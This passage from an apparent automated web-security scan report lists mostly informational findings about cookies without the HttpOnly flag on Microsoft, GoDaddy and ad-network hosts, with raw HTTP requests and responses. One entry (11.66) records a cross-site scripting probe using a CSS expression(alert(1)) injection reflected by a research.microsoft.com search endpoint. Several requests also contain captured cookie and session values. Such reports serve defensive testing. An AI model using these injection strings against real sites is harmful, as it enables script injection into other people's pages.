Type.registerNamespace('dnn.xml');dnn.extend(dnn.xml,{pns:'dnn',ns:'xml',parserName:null,get_parserName:function()
{if(this.parserName==null)
this.parserName=this._getParser();return this.parserNa
...[SNIP]...

11.49. http://microsoftcambridge.com/js/dnn.xmlhttp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/dnn.xmlhttp.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dnn.xmlhttp.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/
Last-Modified: Thu, 17 Feb 2011 20:36:04 GMT
X-Cache-Info: caching
Content-Length: 5518

...
Type.registerNamespace('dnn.xmlhttp');dnn.xmlhttp.callbackType=function(){};dnn.xmlhttp.callbackType.prototype={simple:0,processPage:1,callBackMethod:2,processPageCallbackMethod:3}
dnn.xmlhttp.cal
...[SNIP]...

11.50. http://microsoftcambridge.com/js/dnncore.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/dnncore.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A7ED7F94DE3B77E48C882DE45E648982; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dnncore.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:31 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A7ED7F94DE3B77E48C882DE45E648982; path=/
Last-Modified: Thu, 17 Feb 2011 20:36:07 GMT
X-Cache-Info: caching
Content-Length: 13185

//General
//for example: instead of each module writing out script found in moduleMaxMin_OnClick have the functionality cached
//

var DNN_COL_DELIMITER = String.fromCharCode(16);
var DNN_ROW_DEL
...[SNIP]...

11.51. http://microsoftcambridge.com/js/jfeed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/jfeed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=6DBB5D40CED5CB505D5DB9EE6D76E9D6; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jfeed.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6DBB5D40CED5CB505D5DB9EE6D76E9D6; path=/
Last-Modified: Thu, 17 Feb 2011 20:36:11 GMT
X-Cache-Info: caching
Content-Length: 3774

/* jFeed : jQuery feed parser plugin
* Copyright (C) 2007 Jean-Fran..ois Hovinne - http://www.hovinne.com/
* Dual licensed under the MIT (MIT-license.txt)
* and GPL (GPL-license.txt) licenses.
*/

...[SNIP]...

11.52. http://microsoftcambridge.com/js/jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=6C7CC4F5569112C2183A9F0A7D693744; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6C7CC4F5569112C2183A9F0A7D693744; path=/
Last-Modified: Mon, 28 Mar 2011 18:20:34 GMT
X-Cache-Info: caching
Content-Length: 78768

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

11.53. http://microsoftcambridge.com/js/siteo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/siteo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/siteo.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/
Last-Modified: Tue, 03 May 2011 19:45:11 GMT
X-Cache-Info: caching
Content-Length: 21434

var map = null;
var hash = "";
if(window.location.hostname=='www.microsoftcambridge.com'){window.location.hostname = 'microsoftcambridge.com';}
$(document).ready(function(){
if($('.rotate').lengt
...[SNIP]...

11.54. http://microsoftcambridge.com/js/twitter.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/twitter.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=712652DE2B506D8B3C9F2E6727974039; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/twitter.min.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=712652DE2B506D8B3C9F2E6727974039; path=/
Last-Modified: Mon, 28 Mar 2011 17:19:03 GMT
X-Cache-Info: caching
Content-Length: 5031

/***
* Twitter JS v1.13.3
* http://code.google.com/p/twitterjs/
* Copyright (c) 2009 Remy Sharp / MIT License
* $Date$
*/
/*
MIT (MIT-LICENSE.txt)
*/
typeof renderTwitters!="function"&&funct
...[SNIP]...

11.55. http://microsoftcambridge.com/js/ui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/ui.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=DF1FA1E49AC6733F28ECBEF98F896ADD; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ui.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=DF1FA1E49AC6733F28ECBEF98F896ADD; path=/
Last-Modified: Thu, 17 Feb 2011 20:36:28 GMT
X-Cache-Info: caching
Content-Length: 26583

;(function($){$.ui={plugin:{add:function(module,option,set){var proto=$.ui[module].prototype;for(var i in set){proto.plugins[i]=proto.plugins[i]||[];proto.plugins[i].push([option,set[i]]);}},call:func
...[SNIP]...

11.56. https://mya.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ShopperId1=mcjidfagdephnjweyclebfehyathlbaj; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:28:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.57. https://mya.godaddy.com/products/accountlist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/products/accountlist.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ShopperId1=fhvekhlijizajdrfuatbuisjhckdhiwb; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:26:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.58. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAX=Mhd7ak5indMAAU0C; expires=Tue, 03-Sep-13 21:36:19 GMT; path=/; domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.59. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAX=Mhd7ak5inIsACxRd; expires=Tue, 03-Sep-13 21:30:51 GMT; path=/; domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.60. http://pixel.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.adblade.com
Path:	/imps.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__sgs=9H1OEBpHJTWK0eUV1IWqNKX4KF4U8ibH6Zl%2FNq6xhhI%3D; expires=Sun, 02-Sep-2012 21:40:32 GMT; path=/; domain=.adblade.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.61. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1315061039; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:59 GMT
mt_mop=10008:1315061039|5:1315061038|10002:1313678517|4:1313678521|10001:1312768945; domain=.mathtag.com; path=/; expires=Mon, 03-Oct-2011 14:43:59 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.62. http://pixel.mathtag.com/event/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1315061013; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.63. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%265364%3D1; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.pixel.rubiconproject.com
put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.64. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.pixel.rubiconproject.com
put_1994=vf1kj11kp2en; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.65. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Mon, 02-Sep-2013 14:44:00 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.66. http://research.microsoft.com/apps/search/search.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/search/search.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss; expires=Fri, 03-Sep-2021 12:56:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/search/search.ashx?t=se&p=1&ps=36&so=1&sb=d&fr=&to=&fd=&td=&rt=&f=&a=&pn=27b6a%2522style%25253d%2522x+%25253aexpression%2528alert%25281%2529%2529+%2522d048afd9275&pa=&pd= HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss; expires=Fri, 03-Sep-2021 12:56:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 12:56:27 GMT
Content-Length: 24326

<?xml version="1.0" encoding="utf-8"?><rmc query="27b6a"style="x :expression(alert(1)) "d048afd9275" page="1" path="/apps/search/data.ashx?q=27b6a&quot;style=&quot;x :expression
...[SNIP]...

11.67. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scripts.omniture.com
Path:	/global/scripts/targeting/dyn_prop.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

omniture_unique=6bcc0a791fca22f3e882adf94660e88c; path=/; domain=omniture.com
BIGipServerhttp_omniture=84542986.5892.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.68. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 02-Sep-2012 17:32:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.69. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.expression.microsoft.com
Path:	/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.70. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.expression.microsoft.com
Path:	/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.71. http://static.getclicky.com/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.getclicky.com
Path:	/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

__cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.getclicky.com
__cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.static.getclicky.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.72. http://t4.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t4.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538 HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:32:06 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

11.73. http://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

stat_uniq_code=134386; expires=Sun, 02-Sep-2012 21:37:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response

11.74. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

stat_uniq_code=134386; expires=Sun, 02-Sep-2012 21:48:44 GMT; path=/

